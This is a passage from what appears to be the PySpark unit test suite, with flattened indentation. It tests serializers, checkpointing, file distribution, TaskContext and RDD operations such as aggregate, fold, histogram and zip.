ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class LocalCheckpointTests(ReusedPySparkTestCase):
def test_basic_localcheckpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertFalse(flatMappedRDD.isLocallyCheckpointed())
flatMappedRDD.localCheckpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.isLocallyCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_file_recursively_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello")
self.sc.addFile(path, True)
download_path = SparkFiles.get("hello")
self.assertNotEqual(path, download_path)
with open(download_path + "/hello.txt") as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
with open(download_path + "/sub_hello/sub_hello.txt") as test_file:
self.assertEqual("Sub Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class TaskContextTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
# Allow retries even though they are normally disabled in local mode
self.sc = SparkContext('local[4, 2]', class_name)
def test_stage_id(self):
"""Test the stage ids are available and incrementing as expected."""
rdd = self.sc.parallelize(range(10))
stage1 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
stage2 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
# Test using the constructor directly rather than the get()
stage3 = rdd.map(lambda x: TaskContext().stageId()).take(1)[0]
self.assertEqual(stage1 + 1, stage2)
self.assertEqual(stage1 + 2, stage3)
self.assertEqual(stage2 + 1, stage3)
def test_partition_id(self):
"""Test the partition id."""
rdd1 = self.sc.parallelize(range(10), 1)
rdd2 = self.sc.parallelize(range(10), 2)
pids1 = rdd1.map(lambda x: TaskContext.get().partitionId()).collect()
pids2 = rdd2.map(lambda x: TaskContext.get().partitionId()).collect()
self.assertEqual(0, pids1[0])
self.assertEqual(0, pids1[9])
self.assertEqual(0, pids2[0])
self.assertEqual(1, pids2[9])
def test_attempt_number(self):
"""Verify the attempt numbers are correctly reported."""
rdd = self.sc.parallelize(range(10))
# Verify a simple job with no failures
attempt_numbers = rdd.map(lambda x: TaskContext.get().attemptNumber()).collect()
map(lambda attempt: self.assertEqual(0, attempt), attempt_numbers)
def fail_on_first(x):
"""Fail on the first attempt so we get a positive attempt number"""
tc = TaskContext.get()
attempt_number = tc.attemptNumber()
partition_id = tc.partitionId()
attempt_id = tc.taskAttemptId()
if attempt_number == 0 and partition_id == 0:
raise Exception("Failing on first attempt")
else:
return [x, partition_id, attempt_number, attempt_id]
result = rdd.map(fail_on_first).collect()
# We should re-submit the first partition to it but other partitions should be attempt 0
self.assertEqual([0, 0, 1], result[0][0:3])
self.assertEqual([9, 3, 0], result[9][0:3])
first_partition = filter(lambda x: x[1] == 0, result)
map(lambda x: self.assertEqual(1, x[2]), first_partition)
other_partitions = filter(lambda x: x[1] != 0, result)
map(lambda x: self.assertEqual(0, x[2]), other_partitions)
# The task attempt id should be different
self.assertTrue(result[0][3] != result[9][3])
def test_tc_on_driver(self):
"""Verify that getting the TaskContext on the driver returns None."""
tc = TaskContext.get()
self.assertTrue(tc is None)
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_to_localiterator(self):
from time import sleep
rdd = self.sc.parallelize([1, 2, 3])
it = rdd.toLocalIterator()
sleep(5)
self.assertEqual([1, 2, 3], sorted(it))
rdd2 = rdd.repartition(1000)
it2 = rdd2.toLocalIterator()
sleep(5)
self.assertEqual([1, 2, 3], sorted(it2))
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_cartesian_chaining(self):
# Tests for SPARK-16589
rdd = self.sc.parallelize(range(10), 2)
self.assertSetEqual(
set(rdd.cartesian(rdd).cartesian(rdd).collect()),
set([((x, y), z) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.cartesian(rdd)).collect()),
set([(x, (y, z)) for x in range(10) for y in range(10) for z in range(10)])
)
self.assertSetEqual(
set(rdd.cartesian(rdd.zip(rdd)).collect()),
set([(x, (y, y)) for x in range(10) for y in range(10)])
)
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
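# The next several tests (aggregate, aggregateByKey, fold, foldByKey) all target SPARK-9021:
# the zero value supplied by the caller is mutable (a defaultdict or a list), and the tests
# check that per-partition results do not leak into each other through a shared zero-value
# instance.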
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy()
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regression test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
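# countApproxDistinct(relativeSD) returns an approximate distinct count (default relativeSD
# is about 0.05), so the assertions above only require the estimate to land in a loose window
# around the true count; a relativeSD that is too small is rejected with ValueError, which the
# last assertion checks.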
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
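# For reference: rdd.histogram(buckets) returns a (buckets, counts) pair, e.g.
#   sc.parallelize([1, 2, 3, 5, 6]).histogram([0, 5, 10])  ->  ([0, 5, 10], [3, 2])
# which is why most assertions above index [1] to pick out the counts.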
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_repartition_no_skewed(self):
num_partitions = 20
a = self.sc.parallelize(range(int(1000)), 2)
l = a.repartition(num_partitions).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
l = a.coalesce(num_partitions, True).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
def test_repartition_on_textfile(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
rdd = self.sc.textFile(path)
result = rdd.repartition(1).collect()
self.assertEqual(u"Hello World!", result[0])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
